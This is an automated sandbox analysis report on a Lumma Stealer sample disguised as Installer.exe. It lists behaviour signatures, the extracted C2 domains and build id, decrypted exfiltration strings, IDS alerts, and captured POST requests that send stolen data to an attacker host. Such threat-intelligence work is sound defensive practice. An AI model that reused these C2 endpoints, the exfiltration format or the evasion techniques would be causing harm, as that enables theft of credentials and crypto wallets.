Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Installer.exe

Overview

General Information

Sample name:Installer.exe
Analysis ID:1581507
MD5:0cebf27d0066d6ea5653547254e236e4
SHA1:badfc5a68c17d2d1112e50ccd8ececeb4f8ba8a9
SHA256:21d9bba7ae0dfb0892e5345ee42d73e241e0d9841a17ff340f6278e86d8f54f4
Tags:exeLummaStealersigneduser-ventoy
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
LummaC encrypted strings found
Machine Learning detection for sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to modify clipboard data
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • Installer.exe (PID: 7424 cmdline: "C:\Users\user\Desktop\Installer.exe" MD5: 0CEBF27D0066D6EA5653547254E236E4)
    • conhost.exe (PID: 7432 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • Installer.exe (PID: 7480 cmdline: "C:\Users\user\Desktop\Installer.exe" MD5: 0CEBF27D0066D6EA5653547254E236E4)
    • Installer.exe (PID: 7488 cmdline: "C:\Users\user\Desktop\Installer.exe" MD5: 0CEBF27D0066D6EA5653547254E236E4)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["rebuildeso.buzz", "mindhandru.buzz", "screwamusresz.buzz", "hummskitnj.buzz", "prisonyfork.buzz", "cashfuzysao.buzz", "appliacnesot.buzz", "inherineau.buzz", "scentniej.buzz"], "Build id": "yau6Na--5223198671"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000003.00000003.1835675481.00000000035AD000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000003.00000003.1835591588.00000000035AD000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000003.00000003.1835591588.0000000003559000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            00000003.00000003.1835776038.000000000356C000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              00000003.00000003.1835776038.00000000035AD000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                Click to see the 7 entries

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-27T23:13:25.610456+010020283713Unknown Traffic192.168.2.44973423.55.153.106443TCP
                2024-12-27T23:13:28.309145+010020283713Unknown Traffic192.168.2.449735104.21.66.86443TCP
                2024-12-27T23:13:30.378308+010020283713Unknown Traffic192.168.2.449736104.21.66.86443TCP
                2024-12-27T23:13:32.784606+010020283713Unknown Traffic192.168.2.449737104.21.66.86443TCP
                2024-12-27T23:13:35.188581+010020283713Unknown Traffic192.168.2.449738104.21.66.86443TCP
                2024-12-27T23:13:37.425413+010020283713Unknown Traffic192.168.2.449739104.21.66.86443TCP
                2024-12-27T23:13:40.144074+010020283713Unknown Traffic192.168.2.449741104.21.66.86443TCP
                2024-12-27T23:13:42.627339+010020283713Unknown Traffic192.168.2.449743104.21.66.86443TCP
                2024-12-27T23:13:46.299504+010020283713Unknown Traffic192.168.2.449747104.21.66.86443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-27T23:13:29.065912+010020546531A Network Trojan was detected192.168.2.449735104.21.66.86443TCP
                2024-12-27T23:13:31.195519+010020546531A Network Trojan was detected192.168.2.449736104.21.66.86443TCP
                2024-12-27T23:13:47.067796+010020546531A Network Trojan was detected192.168.2.449747104.21.66.86443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-27T23:13:29.065912+010020498361A Network Trojan was detected192.168.2.449735104.21.66.86443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-27T23:13:31.195519+010020498121A Network Trojan was detected192.168.2.449736104.21.66.86443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-27T23:13:40.950937+010020480941Malware Command and Control Activity Detected192.168.2.449741104.21.66.86443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-27T23:13:26.465709+010028586661Domain Observed Used for C2 Detected192.168.2.44973423.55.153.106443TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus detection for URL or domain
                Source: https://lev-tolstoi.com/apix:ZAvira URL Cloud: Label: malware
                Source: https://lev-tolstoi.com/$5Avira URL Cloud: Label: malware
                Source: https://lev-tolstoi.com/NVmAAvira URL Cloud: Label: malware
                Source: https://lev-tolstoi.com/espFAvira URL Cloud: Label: malware
                Source: https://lev-tolstoi.com/pi.WAvira URL Cloud: Label: malware
                Source: https://lev-tolstoi.com/apimAvira URL Cloud: Label: malware
                Source: https://lev-tolstoi.com/SAvira URL Cloud: Label: malware
                Found malware configuration
                Source: 00000000.00000002.1672929760.0000000003462000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: LummaC {"C2 url": ["rebuildeso.buzz", "mindhandru.buzz", "screwamusresz.buzz", "hummskitnj.buzz", "prisonyfork.buzz", "cashfuzysao.buzz", "appliacnesot.buzz", "inherineau.buzz", "scentniej.buzz"], "Build id": "yau6Na--5223198671"}
                Multi AV Scanner detection for submitted file
                Source: Installer.exeReversingLabs: Detection: 34%
                Machine Learning detection for sample
                Source: Installer.exeJoe Sandbox ML: detected
                Sample uses string decryption to hide its real strings
                Source: 00000000.00000002.1672929760.0000000003462000.00000004.00000020.00020000.00000000.sdmpString decryptor: hummskitnj.buzz
                Source: 00000000.00000002.1672929760.0000000003462000.00000004.00000020.00020000.00000000.sdmpString decryptor: cashfuzysao.buzz
                Source: 00000000.00000002.1672929760.0000000003462000.00000004.00000020.00020000.00000000.sdmpString decryptor: appliacnesot.buzz
                Source: 00000000.00000002.1672929760.0000000003462000.00000004.00000020.00020000.00000000.sdmpString decryptor: screwamusresz.buzz
                Source: 00000000.00000002.1672929760.0000000003462000.00000004.00000020.00020000.00000000.sdmpString decryptor: inherineau.buzz
                Source: 00000000.00000002.1672929760.0000000003462000.00000004.00000020.00020000.00000000.sdmpString decryptor: scentniej.buzz
                Source: 00000000.00000002.1672929760.0000000003462000.00000004.00000020.00020000.00000000.sdmpString decryptor: rebuildeso.buzz
                Source: 00000000.00000002.1672929760.0000000003462000.00000004.00000020.00020000.00000000.sdmpString decryptor: prisonyfork.buzz
                Source: 00000000.00000002.1672929760.0000000003462000.00000004.00000020.00020000.00000000.sdmpString decryptor: mindhandru.buzz
                Source: 00000000.00000002.1672929760.0000000003462000.00000004.00000020.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
                Source: 00000000.00000002.1672929760.0000000003462000.00000004.00000020.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
                Source: 00000000.00000002.1672929760.0000000003462000.00000004.00000020.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
                Source: 00000000.00000002.1672929760.0000000003462000.00000004.00000020.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
                Source: 00000000.00000002.1672929760.0000000003462000.00000004.00000020.00020000.00000000.sdmpString decryptor: Workgroup: -
                Source: 00000000.00000002.1672929760.0000000003462000.00000004.00000020.00020000.00000000.sdmpString decryptor: yau6Na--5223198671
                Source: C:\Users\user\Desktop\Installer.exeCode function: 3_2_00415200 CryptUnprotectData,3_2_00415200
                Source: Installer.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: unknownHTTPS traffic detected: 23.55.153.106:443 -> 192.168.2.4:49734 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.4:49735 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.4:49736 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.4:49737 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.4:49738 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.4:49739 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.4:49741 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.4:49743 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.4:49747 version: TLS 1.2
                Source: C:\Users\user\Desktop\Installer.exeCode function: 2_2_00361F38 FindFirstFileExW,2_2_00361F38
                Source: C:\Users\user\Desktop\Installer.exeCode function: 2_2_00361FE9 FindFirstFileExW,FindNextFileW,FindClose,FindClose,2_2_00361FE9
                Source: C:\Users\user\Desktop\Installer.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+0000026Dh]3_2_00415200
                Source: C:\Users\user\Desktop\Installer.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+70h]3_2_00409370
                Source: C:\Users\user\Desktop\Installer.exeCode function: 4x nop then mov edx, ecx3_2_00409370
                Source: C:\Users\user\Desktop\Installer.exeCode function: 4x nop then mov word ptr [ecx], dx3_2_0043F39E
                Source: C:\Users\user\Desktop\Installer.exeCode function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h3_2_00440CE0
                Source: C:\Users\user\Desktop\Installer.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 798ECF08h3_2_00439490
                Source: C:\Users\user\Desktop\Installer.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 11A82DE9h3_2_00439490
                Source: C:\Users\user\Desktop\Installer.exeCode function: 4x nop then movzx edx, byte ptr [esp+ecx+446E8726h]3_2_00441DA0
                Source: C:\Users\user\Desktop\Installer.exeCode function: 4x nop then cmp dword ptr [edx+ecx*8], 9164D103h3_2_00440E00
                Source: C:\Users\user\Desktop\Installer.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-2DC31920h]3_2_00422E3F
                Source: C:\Users\user\Desktop\Installer.exeCode function: 4x nop then mov edx, ecx3_2_00422E3F
                Source: C:\Users\user\Desktop\Installer.exeCode function: 4x nop then movzx edi, byte ptr [esp+edx+74842D10h]3_2_00422E3F
                Source: C:\Users\user\Desktop\Installer.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax+0Ch]3_2_004396A0
                Source: C:\Users\user\Desktop\Installer.exeCode function: 4x nop then movzx edx, byte ptr [ebx+ecx-4835D6BBh]3_2_0040D7CF
                Source: C:\Users\user\Desktop\Installer.exeCode function: 4x nop then mov edx, ebx3_2_0040B79B
                Source: C:\Users\user\Desktop\Installer.exeCode function: 4x nop then cmp word ptr [esi+eax], 0000h3_2_0041D050
                Source: C:\Users\user\Desktop\Installer.exeCode function: 4x nop then mov word ptr [eax], cx3_2_0041780D
                Source: C:\Users\user\Desktop\Installer.exeCode function: 4x nop then cmp dword ptr [edx+ecx*8], 2DFE5A91h3_2_004410D0
                Source: C:\Users\user\Desktop\Installer.exeCode function: 4x nop then movzx esi, byte ptr [esp+edx+2Ch]3_2_0042788F
                Source: C:\Users\user\Desktop\Installer.exeCode function: 4x nop then mov edi, dword ptr [ebp-10h]3_2_0041C900
                Source: C:\Users\user\Desktop\Installer.exeCode function: 4x nop then add ebp, dword ptr [esp+0Ch]3_2_0042B100
                Source: C:\Users\user\Desktop\Installer.exeCode function: 4x nop then mov ecx, eax3_2_00427917
                Source: C:\Users\user\Desktop\Installer.exeCode function: 4x nop then test eax, eax3_2_0043A120
                Source: C:\Users\user\Desktop\Installer.exeCode function: 4x nop then movzx eax, byte ptr [esp+ecx+338E7E12h]3_2_0043A120
                Source: C:\Users\user\Desktop\Installer.exeCode function: 4x nop then mov ebx, eax3_2_00405930
                Source: C:\Users\user\Desktop\Installer.exeCode function: 4x nop then mov ebp, eax3_2_00405930
                Source: C:\Users\user\Desktop\Installer.exeCode function: 4x nop then movzx eax, word ptr [ebp+00h]3_2_0043A9D6
                Source: C:\Users\user\Desktop\Installer.exeCode function: 4x nop then sub edx, 01h3_2_004409E0
                Source: C:\Users\user\Desktop\Installer.exeCode function: 4x nop then movzx ecx, byte ptr [esp+edx]3_2_00426190
                Source: C:\Users\user\Desktop\Installer.exeCode function: 4x nop then movzx edi, byte ptr [ecx]3_2_0043E9B3
                Source: C:\Users\user\Desktop\Installer.exeCode function: 4x nop then movzx esi, byte ptr [esp+edx+2Ch]3_2_00427A3F
                Source: C:\Users\user\Desktop\Installer.exeCode function: 4x nop then movzx ebx, byte ptr [eax+edx]3_2_0041F2C0
                Source: C:\Users\user\Desktop\Installer.exeCode function: 4x nop then mov word ptr [eax], cx3_2_004292E0
                Source: C:\Users\user\Desktop\Installer.exeCode function: 4x nop then movzx ebx, byte ptr [esp+edi-535229ACh]3_2_004402B0
                Source: C:\Users\user\Desktop\Installer.exeCode function: 4x nop then sub edx, 01h3_2_004402B0
                Source: C:\Users\user\Desktop\Installer.exeCode function: 4x nop then movzx edi, byte ptr [ecx+esi]3_2_00402B70
                Source: C:\Users\user\Desktop\Installer.exeCode function: 4x nop then movzx ebx, byte ptr [edx]3_2_00436370
                Source: C:\Users\user\Desktop\Installer.exeCode function: 4x nop then mov eax, ecx3_2_00408B00
                Source: C:\Users\user\Desktop\Installer.exeCode function: 4x nop then mov byte ptr [edi], cl3_2_0042D306
                Source: C:\Users\user\Desktop\Installer.exeCode function: 4x nop then jmp dword ptr [00448B7Ch]3_2_00428307
                Source: C:\Users\user\Desktop\Installer.exeCode function: 4x nop then movzx ebp, byte ptr [esp+esi-6Fh]3_2_004393C0
                Source: C:\Users\user\Desktop\Installer.exeCode function: 4x nop then movzx ebx, byte ptr [esp+edi-535229ACh]3_2_004403D0
                Source: C:\Users\user\Desktop\Installer.exeCode function: 4x nop then sub edx, 01h3_2_004403D0
                Source: C:\Users\user\Desktop\Installer.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+00000274h]3_2_0042BBE3
                Source: C:\Users\user\Desktop\Installer.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+00000274h]3_2_0042BC53
                Source: C:\Users\user\Desktop\Installer.exeCode function: 4x nop then movzx edx, byte ptr [ebp+eax-00000258h]3_2_0043EC60
                Source: C:\Users\user\Desktop\Installer.exeCode function: 4x nop then mov edx, ecx3_2_00416C77
                Source: C:\Users\user\Desktop\Installer.exeCode function: 4x nop then mov byte ptr [edi], cl3_2_0042D4D0
                Source: C:\Users\user\Desktop\Installer.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx-53h]3_2_00419C90
                Source: C:\Users\user\Desktop\Installer.exeCode function: 4x nop then mov edx, ecx3_2_00419C90
                Source: C:\Users\user\Desktop\Installer.exeCode function: 4x nop then mov byte ptr [edi], cl3_2_0042D49A
                Source: C:\Users\user\Desktop\Installer.exeCode function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]3_2_004074A0
                Source: C:\Users\user\Desktop\Installer.exeCode function: 4x nop then movzx ecx, word ptr [edi+esi*4]3_2_004074A0
                Source: C:\Users\user\Desktop\Installer.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+00000274h]3_2_0042BB19
                Source: C:\Users\user\Desktop\Installer.exeCode function: 4x nop then sub edx, 01h3_2_00440550
                Source: C:\Users\user\Desktop\Installer.exeCode function: 4x nop then mov byte ptr [ecx], al3_2_0041C561
                Source: C:\Users\user\Desktop\Installer.exeCode function: 4x nop then movzx edi, byte ptr [esi+eax+26h]3_2_0041C561
                Source: C:\Users\user\Desktop\Installer.exeCode function: 4x nop then mov byte ptr [edi], al3_2_0041C561
                Source: C:\Users\user\Desktop\Installer.exeCode function: 4x nop then movzx esi, byte ptr [eax]3_2_00426513
                Source: C:\Users\user\Desktop\Installer.exeCode function: 4x nop then mov edx, ecx3_2_00425DEA
                Source: C:\Users\user\Desktop\Installer.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h3_2_00425DEA
                Source: C:\Users\user\Desktop\Installer.exeCode function: 4x nop then cmp dword ptr [edi+ebp*8], 385488F2h3_2_0043A640
                Source: C:\Users\user\Desktop\Installer.exeCode function: 4x nop then mov byte ptr [edi], cl3_2_0042D64C
                Source: C:\Users\user\Desktop\Installer.exeCode function: 4x nop then movzx ecx, byte ptr [ebp+eax-38h]3_2_0043EE50
                Source: C:\Users\user\Desktop\Installer.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]3_2_0042A660
                Source: C:\Users\user\Desktop\Installer.exeCode function: 4x nop then mov edx, eax3_2_0041966B
                Source: C:\Users\user\Desktop\Installer.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h3_2_00425E70
                Source: C:\Users\user\Desktop\Installer.exeCode function: 4x nop then sub edx, 01h3_2_00440600
                Source: C:\Users\user\Desktop\Installer.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], EABBD981h3_2_0040DE13
                Source: C:\Users\user\Desktop\Installer.exeCode function: 4x nop then mov word ptr [eax], cx3_2_00417E1A
                Source: C:\Users\user\Desktop\Installer.exeCode function: 4x nop then mov ebx, eax3_2_00417E1A
                Source: C:\Users\user\Desktop\Installer.exeCode function: 4x nop then sub edx, 01h3_2_00440690
                Source: C:\Users\user\Desktop\Installer.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+5B5F0E69h]3_2_004146A0
                Source: C:\Users\user\Desktop\Installer.exeCode function: 4x nop then mov eax, ecx3_2_004146A0
                Source: C:\Users\user\Desktop\Installer.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h3_2_004146A0
                Source: C:\Users\user\Desktop\Installer.exeCode function: 4x nop then mov ecx, eax3_2_00426EB0
                Source: C:\Users\user\Desktop\Installer.exeCode function: 4x nop then mov ecx, eax3_2_0040A770
                Source: C:\Users\user\Desktop\Installer.exeCode function: 4x nop then push eax3_2_00415F19
                Source: C:\Users\user\Desktop\Installer.exeCode function: 4x nop then mov ecx, edx3_2_004227E0
                Source: C:\Users\user\Desktop\Installer.exeCode function: 4x nop then mov byte ptr [eax], cl3_2_00416790
                Source: C:\Users\user\Desktop\Installer.exeCode function: 4x nop then mov byte ptr [eax], cl3_2_00416790
                Source: C:\Users\user\Desktop\Installer.exeCode function: 4x nop then movzx edx, byte ptr [esi+ecx]3_2_0041E7A0
                Source: C:\Users\user\Desktop\Installer.exeCode function: 4x nop then movsx ecx, byte ptr [edi+eax]3_2_0043F7B2

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.4:49734 -> 23.55.153.106:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49747 -> 104.21.66.86:443
                Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49736 -> 104.21.66.86:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49736 -> 104.21.66.86:443
                Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49741 -> 104.21.66.86:443
                Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49735 -> 104.21.66.86:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49735 -> 104.21.66.86:443
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: rebuildeso.buzz
                Source: Malware configuration extractorURLs: mindhandru.buzz
                Source: Malware configuration extractorURLs: screwamusresz.buzz
                Source: Malware configuration extractorURLs: hummskitnj.buzz
                Source: Malware configuration extractorURLs: prisonyfork.buzz
                Source: Malware configuration extractorURLs: cashfuzysao.buzz
                Source: Malware configuration extractorURLs: appliacnesot.buzz
                Source: Malware configuration extractorURLs: inherineau.buzz
                Source: Malware configuration extractorURLs: scentniej.buzz
                Source: Joe Sandbox ViewIP Address: 104.21.66.86 104.21.66.86
                Source: Joe Sandbox ViewIP Address: 23.55.153.106 23.55.153.106
                Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49735 -> 104.21.66.86:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49734 -> 23.55.153.106:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49743 -> 104.21.66.86:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49737 -> 104.21.66.86:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49747 -> 104.21.66.86:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49741 -> 104.21.66.86:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49739 -> 104.21.66.86:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49736 -> 104.21.66.86:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49738 -> 104.21.66.86:443
                Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: lev-tolstoi.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 52Host: lev-tolstoi.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=PTTT95CE7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18114Host: lev-tolstoi.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=V65PP5PG20HUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8747Host: lev-tolstoi.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=L860Q9XLZ5OUXDNV6User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20436Host: lev-tolstoi.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=I6ZOP83R0KUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1218Host: lev-tolstoi.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=8TXD8I0K6I3O97JCMUWUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 570573Host: lev-tolstoi.com
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 87Host: lev-tolstoi.com
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
